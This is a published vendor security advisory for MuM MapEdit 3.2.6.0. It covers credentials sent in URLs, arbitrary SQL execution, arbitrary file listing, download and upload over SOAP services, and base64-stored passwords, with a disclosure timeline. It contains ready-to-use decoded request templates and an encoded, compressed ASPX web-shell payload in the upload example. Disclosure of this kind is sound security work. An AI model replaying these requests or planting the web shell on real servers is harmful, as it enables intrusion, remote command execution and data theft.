Admin

# Security Advisory -- Multiple Vulnerabilities - MuM Map Edit ## Product Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH Product: MapEdit Affected software version: 3.2.6.0 MuM MapEdit provides geodata to the internet and intranets and is deployed on several communal and regional governmental infrastructures to provide geodata to the population. It consists of a silverlight client and a C#.NET backend. The communication between them is HTTP/S based and involves the NBFS (.NET Binary Format SOAP). Link: http://www.mum.de/DE_Autodesk-Topobase-GIS-Datenerfassung-MuM-MapEdit.CAD ## Status/Metrics/Identifier CVE-ID: tbd CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C) CVSS Score: 9.0 The CVSS Score reflects the possibility of an attacker to upload web shells and execute them with the privileges of the web server user. ## Author/Credits Paul Baade (TUV Rheinland i-sec GmbH) Sven Krewitt (TUV Rheinland i-sec GmbH) ## Fixed Versions According to MuM all described vulnerabilities are fixed in version 6.2.74, some of them are reportedly already fixed in version 5.1. ## Authentication via GET Parameter The application requires users to provide their credentials via GET Parameters. They can therefore possibly be found in server logs or proxy logs. An example URL would be: /Mum.Geo.Services/Start.aspx?AutoUrl=1&Username=TEST&Password=TEST[...] ## Execution of arbitrary SQL commands on contained SQLite DBs The application contains several SQLite databases. An authenticated user may send POST requests to the URL /Mum.Geo.Services/DataAccessService.svc. This service is used to execute SQL queries on the databases. The content of the POST request is encoded in Microsofts NBFS (.NET Binary Format SOAP) and can be decoded to the following XML data: Request: -------- urn:DataAccessService/QueryData urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3 http://www.w3.org/2005/08/addressing/anonymous http://[host]/Mum.Geo.Services/DataAccessService.svc 0 999 0 SYSTEM Unknown [path_to_MumGeoData]\System\System.db select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption 0 1 2000 0 The node "Filename" can be used to access different SQLite databases on the system, while the node "sql" contains the SQL-query to be executed on the system. Responses to this request are encoded in NBFS as well and can be decoded to the following XML data: Response: --------- urn:DataAccessService/QueryDataResponse urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3 eNpjZAACZncXTwihYm6SlpiUammsa2hpaKlrkmhsrpuYamSpa2RkbGxpkZpsYZCSDAD4Jgsj true NAME DbString false false 255 NAME 0 0 CAPTION DbString false false 255 CAPTION 0 0 VERSION_SYSTEMDATA DbString true false 40 VERSION_SYSTEMDATA 0 0 true The nodes "DbColumnDefinition" contain the definition of the returned columns, the node "Data" contains the result of the SQL-query as an Base64-encoded zlib-compressed data: GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc The same result can be produced, when the database is locally read: >sqlite3 System.db sqlite> select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption; GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc ## Arbitrary file manipulation By sending POST requests to the URL /Mum.Geo.Services/IO.svc an authenticated user is able to perform several actions. Most interesting, from an attacker's point of view, would be the following: - "GetFileName", which lists files in a given folder - "DownloadFile", which enables the user to download any file the web server has read-access to - "UploadFile", which allows to upload files to folders the web server has write-access to The different activities are documented in the subsections below. As well as in the SQL execution section, the request and response content is decoded from NBFS for better readability. ### File exploration An authenticated user is able to list all files in a given folder by sending the following content to the IO Service. Request: -------- urn:IO/GetFileNames urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676 http://www.w3.org/2005/08/addressing/anonymous http://[host]/Mum.Geo.Services/IO.svc [path_to_webroot] *.* false Response: --------- urn:IO/GetFileNamesResponse urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676 clientaccesspolicy.xml crossdomain.xml iisstart.htm index.html index.php Thumbs.db web.config welcome.png [path_to_webroot] true ### Download of arbitrary files The same web service can be abused to download any file, that the web server user has read-access to. Request: -------- urn:IO/DownloadFile urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504 http://www.w3.org/2005/08/addressing/anonymous http://[host]/Mum.Geo.Services/IO.svc [path_to_webroot]\Mum.Geo.Services\Admin.html Response: --------- urn:IO/DownloadFileResponse urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504 77u/PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQogICAgPHRpdGxlPkFkbWluPC90aXRsZT4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOyBVUkw9U3RhcnQuYXNweD9BZG1pbk1vZGU9dHJ1ZSIvPg0KPC9oZWFkPg0KPGJvZHk+DQogIDxwPjxhIGhyZWY9IlN0YXJ0LmFzcHg/QWRtaW5Nb2RlPXRydWUiPlN0YXJ0IE11bSBBZG1pbmlzdHJhdG9yPC9hPjwvcD4gDQo8L2JvZHk+DQo8L2h0bWw+DQo= false true The node "Data" itself can be base64-decoded, to receive the file contents: i>>? Admin

Start Mum Administrator

### Upload of arbitrary files The web service can be abused to upload a file to any folder, that the web server user has write-access to. Request: -------- urn:IO/UploadFile urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a http://www.w3.org/2005/08/addressing/anonymous http://[host]/Mum.Geo.Services/IO.svc [path_to_webroot]\MumGeoData\Userdata\GDI\isec.aspx [path_to_MumGeoData]\Userdata\GDI\e41279bd-343d-48a1-a413-05e1b3c50f40\Bookmarks\Bookmarks.sod.tmp636008925231332626 eJyFk21P2zAQx9/nU5w8IbXalj4A29Qk1aANolJHK5qJaW+QkxwhW2JHtgNBE99956TdWEHsleN7/Pl/F//gM6x5hrDkIqvpI2CzNwzmGNdZwIyqkUGkeEL2G15ouh1MHZ+SFmUllYELXqKuWv/mQRss3XnOMyG1yRP9/+DFqovRicor8wQiIQhVC24CplHdoWJT507maQt7vZQ87cn4ByYGNIoU1TsI71CYE5VpwL7zy3l0tFG5yCBsktrgrEx7WwNXmQ1YK5mg1hvDlVmIGwmVziEAgfew7+r1PYe87lleoH0DhbGkTF1skHUe6luX1F9b1yAB9pa6dK5LTHNFoFRNpFylq9pUtaE4K24X8lXj5haLImzQspKv1drbMUJFpu2321L1KI2gNkYhLy+RkwKgTalSRZGV+28vbyeFpeuiXJsTyVCk9m1b26yQGu1doamVAO2Riq3o9Fhiu54VefJzX/ftJPfkv6RBS6HRvVK5wR7zK4VTRrX3HJt2uO65KYtQJDLF3t95mcYWdCNsTL//PJX5g13RR8cfdCtEu3QefVnaIzyZ02FyU+CU36MAritXoIF7jLWV2x90TkreBscyfQA6b6QqIU8DO2UGJZpbSZeKtvr5VvpUdmIZT2XT5nTYjJR+KGiTv79fXMzDbxMYDUceLMOzaAJHw+Oq8WC92iyixepiAjzWsqBnexCt1hMYD6tmvxNc5am5Ddj42Dqn/uBJ3y3FaW2MFB0E0h8oXqQY7yg+fHydYvTpBQrbMWDYDonBSrQ70Qr1Z0N2cB3Olm3JYyxatCIubJGX0A53aIej4esCjZ+jTWeyLGnvJ133tqGdrR2mPe1w21m3+/EbI5Kikw== false true The "data" node contains a base64-encoded, zlib-packed aspx web shell. It can be used to issue arbitrary commands on the compromised host. Response: --------- urn:IO/UploadFileResponse urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a true ## Base64 encoded Passwords In the database file in \MumGeoData\System\System.db Passwords are stored in the tables "user" and "connection". Both tables store their passwords in plain text with base64 encoding applied. Example: sqlite> select * from user where name='MUM'; |MUM||1|| ## Remark about information disclosures Observing the communication between a MapEdit Silverlight client and its backend server, various information could be gathered, particularly file paths and license keys. Additionally the error messages, that the server generates discloses quite a lot of information about the backend parsing process. ## History 2016-06-07 Discovery of mentioned vulnerabilities 2016-06-09 First contact with MuM 2016-06-23 confirmation of mentioned vulnerabilities 2016-07-29 Release of version 6.2.74 2016-09-13 Public disclosure